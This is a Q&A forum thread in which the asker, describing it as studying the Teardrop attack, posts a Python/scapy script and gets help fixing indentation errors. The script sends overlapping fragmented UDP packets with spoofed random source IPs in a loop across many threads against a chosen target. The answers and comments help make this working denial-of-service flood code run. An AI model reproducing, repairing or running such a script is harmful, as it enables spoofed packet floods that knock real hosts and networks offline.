# NameError: name 'nestea' is not defined

Tags: python, multithreading

I am studying the Tear Drop attack.
I found the source code below on the internet. Unfortunately, I get an error. 
It seems the indentation is causing an error, but I can not find it.

> Traceback (most recent call last):
>    File "te.py", line 11, in 
>      class nestea(Thread):
>    File "te.py", line 60, in nestea
>      nest = nestea(host, port)
>   NameError: name 'nestea' is not defined

```
#!/usr/bin/python
# -*- coding: utf-8 -*-


from scapy.all import *
from threading import Thread
import string
import random
import argparse
import socket

class nestea(Thread):
    def __init__(self,dst_ip,dst_port):
        Thread.__init__(self)
        self.dst_IP=dst_IP
        self.dst_port=dst_port
        self.running=True
        self.intercount=0
        self.data=random.choice(string.ascii_letters+string.digits)

    def run(self):
        try:
            while self.running:
                print('Packet Sent:'+str(self.intercount))

                self.id=random.choice(range(1,65535))
                self.src_ip=str(RandIP())
                self.src_port=int(RandShort())

                send((IP(src=self.src_ip,dst=self.dst_IP, id=self.id, flags="MF")/UDP(sport=self.src_port,dport=self.dst_port)/((self.data*1420))))
                send((IP(src=self.src_ip,dst=self.dst_IP, id=self.id, frag=130))/(self.data*1420))
                send((IP(src=self.src_ip,dst=self.dst_IP, id=self.id, flags="MF", frag=350)/UDP(sport=self.src_port,dport=self.dst_port)/(self.data*1420)))
                send((IP(src=self.src_ip,dst=self.dst_IP, id=self.id, flags=0, frag=520)/UDP(sport=self.src_port,dport=self.dst_port))/(self.data*1420))
                self.intercount+=1
        except:
            self.run()

    def arg_userage():
        print("hi")
        time.sleep(5)

    def parse():
        parser = argparse.ArgumentParser()
        parser.add_argument('-i',type=str,help='--target IP <Hostname|IP>')
        parser.add_argument('-p',type=int,help='--port <Destination Port>')
        parser.add_argument('-t',type=int,help='--threads <Number of Multi Run threads> Defaults to 256',default=256)
        args=parser.parse_args()
        return args

    if __name__=='__main__':
        arg_userage()
        args=parse()
        if args.i:
            host=args.i
        if args.p:
            port=args.p
        if args.t:
            threads=args.t

        for nest in range(threads):
            nest = nestea(host, port)
            nest.start()
```

Comment: Read the error. It tells you the exact reason.

Answer (score 1):

It is an indentation problem. The code below should be outside the class. Reduce the indentation of the code below.

```
    if __name__=='__main__':
        arg_userage()
        ..
```

to

```
if __name__=='__main__':
    arg_userage()
    ..
```

Comment: Traceback (most recent call last):
  File "te.py", line 50, in <module>
    arg_userage()
NameError: name 'arg_userage' is not defined


A new error has been generated....:(

Comment: Reduce the indentation for `arg_userage` and `parse` functions also.

Comment: I'm really sorry, but why is not it justified when it's defined?

Comment: It is defined inside the class, to call it you'll need to create an object of that class.